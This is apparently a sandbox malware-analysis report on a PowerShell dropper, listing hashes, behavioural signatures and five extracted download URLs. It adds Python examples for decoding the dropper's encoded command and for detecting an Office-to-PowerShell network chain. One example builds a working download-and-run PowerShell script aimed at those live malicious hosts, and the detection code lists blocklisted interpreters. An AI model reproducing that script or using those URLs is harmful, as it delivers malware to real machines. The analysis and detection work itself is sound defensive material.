General

  • Target

    ed263a78384f69cde5daa07fe61dc990_JaffaCakes118

  • Size

    147KB

  • Sample

    240920-jstajswcrh

  • MD5

    ed263a78384f69cde5daa07fe61dc990

  • SHA1

    27f54e69c2c3ac5b480907548104215d72273aca

  • SHA256

    75ed06f8a1cd5fae3d642273b0ab549d634b59ca55f6648e8d0f0c5f6896b7da

  • SHA512

    194620b1ef3c5de5e271c3c9accb792f51413efac5635228fe6b6a80e70dbad0c43a1a07925e7a6c023aae4af1b25f4d648db84bcc8a8c0526697b1bff34a3cc

  • SSDEEP

    1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs (exe.dropper)

    http://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq
    http://13.114.25.231/NF4
    http://arcelectricnj.com/D
    http://lakunat.ru/N
    http://paulofodra.com.br/t9Nf
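The config above is the result of decoding and deobfuscating the dropper's PowerShell and pulling out the download URLs. The block below is an added example of that extraction step; it is not the sandbox's config extractor and not the sample's own script. The command line it decodes is constructed here: it embeds the five reported URLs in the '@'-joined list style often seen in PowerShell droppers, behind a UTF-16LE base64 -EncodedCommand, with one 'ht'+'tp' string split. The script body, the flag names and the concatenation trick are assumptions about shape; only the URLs come from the report.

```python
import base64
import re

# Constructed stand-in for the kind of command line a PowerShell exe.dropper
# hands to powershell.exe. Assumption about shape, NOT the report's actual
# script; only the five URLs come from the extracted config.
_SCRIPT = (
    "$u=('ht'+'tp://162.243.7.179/wp-content/themes/alveophase3/msf-files/2NWAJq@'"
    "+'http://13.114.25.231/NF4@http://arcelectricnj.com/D@'"
    "+'http://lakunat.ru/N@http://paulofodra.com.br/t9Nf').Split('@');"
    "$f=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$f);"
    "Invoke-Item $f;break}catch{}}"
)
SAMPLE_CMDLINE = (
    "powershell -NoP -NonI -W Hidden -Enc "
    + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
_CONCAT = re.compile(r"'\s*\+\s*'")             # 'ht'+'tp' -> 'http'
_URL = re.compile(r"https?://[^\s'\"@;(){}]+", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script hidden behind -EncodedCommand ('' if absent)."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return ""
    raw = base64.b64decode(m.group(1))
    return raw.decode("utf-16-le", errors="replace")


def deobfuscate(script: str) -> str:
    """Collapse adjacent string literals joined with '+' until nothing changes."""
    prev = None
    while prev != script:
        prev, script = script, _CONCAT.sub("", script)
    return script


def extract_dropper_urls(cmdline: str) -> list[str]:
    """Decode, deobfuscate, and return the ordered, de-duplicated URL list.

    Falls back to scanning the raw command line when no -Enc payload is present.
    """
    script = deobfuscate(decode_encoded_command(cmdline) or cmdline)
    seen, urls = set(), []
    for url in _URL.findall(script):
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


if __name__ == "__main__":
    for u in extract_dropper_urls(SAMPLE_CMDLINE):
        print("exe.dropper", u)
```

The '@' is deliberately excluded from the URL character class so a joined list splits into separate indicators; a real extractor also has to handle -Command bodies, `[char]` arrays and `-join`, which this example does not attempt.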

Targets

    • Target

      ed263a78384f69cde5daa07fe61dc990_JaffaCakes118

    • Size

      147KB

    • MD5

      ed263a78384f69cde5daa07fe61dc990

    • SHA1

      27f54e69c2c3ac5b480907548104215d72273aca

    • SHA256

      75ed06f8a1cd5fae3d642273b0ab549d634b59ca55f6648e8d0f0c5f6896b7da

    • SHA512

      194620b1ef3c5de5e271c3c9accb792f51413efac5635228fe6b6a80e70dbad0c43a1a07925e7a6c023aae4af1b25f4d648db84bcc8a8c0526697b1bff34a3cc

    • SSDEEP

      1536:WFR81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9wq60WflV:88GhDS0o9zTGOZD6EbzCd7QV

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell (T1059.001)

      Executes commands through powershell.exe.
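The three signatures above are the classic maldoc chain: an Office parent spawns an interpreter, and that interpreter, which has no business opening sockets, reaches out to a dropper host. The block below is an added example of how to express those checks over process-creation and network-connection telemetry and join them on the process ID; it is not the sandbox's detection logic. The events are constructed in the shape of Sysmon Event ID 1 and Event ID 3, the Office-parent and blocklist sets are assumptions, and the only value taken from the report is the first dropper host, 162.243.7.179.

```python
import ntpath

# Assumed policy sets; tune to the environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Interpreters and LOLBins that should not normally make outbound connections.
BLOCKLISTED_NETWORK = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "regsvr32.exe", "certutil.exe"}
# ATT&CK Enterprise technique IDs for the child images above.
TECHNIQUES = {"powershell.exe": "T1059.001", "pwsh.exe": "T1059.001",
              "cmd.exe": "T1059.003", "mshta.exe": "T1218.005",
              "regsvr32.exe": "T1218.010", "rundll32.exe": "T1218.011"}

WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed telemetry, Sysmon-style: id 1 = ProcessCreate, id 3 = NetworkConnect.
# Not events from the report's sandbox run; only the first dest_ip is from the page.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4312, "ppid": 1180, "image": WORD, "parent_image": EXPLORER},
    {"id": 1, "pid": 5100, "ppid": 4312, "image": PS, "parent_image": WORD},
    {"id": 3, "pid": 5100, "image": PS, "dest_ip": "162.243.7.179", "dest_port": 80},
    {"id": 1, "pid": 6024, "ppid": 1180, "image": CHROME, "parent_image": EXPLORER},
    {"id": 3, "pid": 6024, "image": CHROME, "dest_ip": "203.0.113.5", "dest_port": 443},
]


def _name(path: str) -> str:
    """Lower-cased image basename; ntpath handles Windows paths on any host."""
    return ntpath.basename(path).lower()


def unexpected_children(events):
    """Signature 1: Office parent spawning an interpreter. -> (parent, child, pid)."""
    return [(_name(e["parent_image"]), _name(e["image"]), e["pid"])
            for e in events
            if e["id"] == 1
            and _name(e["parent_image"]) in OFFICE_PARENTS
            and _name(e["image"]) in SCRIPT_CHILDREN]


def blocklisted_network(events):
    """Signature 2: blocklisted image making a connection. -> (image, ip, port)."""
    return [(_name(e["image"]), e["dest_ip"], e["dest_port"])
            for e in events
            if e["id"] == 3 and _name(e["image"]) in BLOCKLISTED_NETWORK]


def kill_chain(events):
    """Join the two signatures on PID: an Office-spawned interpreter that then
    reached the network. -> (pid, parent, child, dest_ip)."""
    spawned = {pid: (parent, child) for parent, child, pid in unexpected_children(events)}
    chain = []
    for e in events:
        if e["id"] == 3 and e["pid"] in spawned:
            parent, child = spawned[e["pid"]]
            chain.append((e["pid"], parent, child, e["dest_ip"]))
    return chain


def techniques(events):
    """ATT&CK technique IDs implied by the interpreters that fired signature 1."""
    return sorted({TECHNIQUES[c] for _, c, _ in unexpected_children(events) if c in TECHNIQUES})


if __name__ == "__main__":
    for pid, parent, child, ip in kill_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {parent} -> {child} -> {ip}  {techniques(SAMPLE_EVENTS)}")
```

Joining on the bare PID is only safe inside a single short sandbox run; in production telemetry PIDs are reused, so key the join on a process GUID (Sysmon's ProcessGuid) and bound it by process start and end time.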

MITRE ATT&CK Enterprise v15
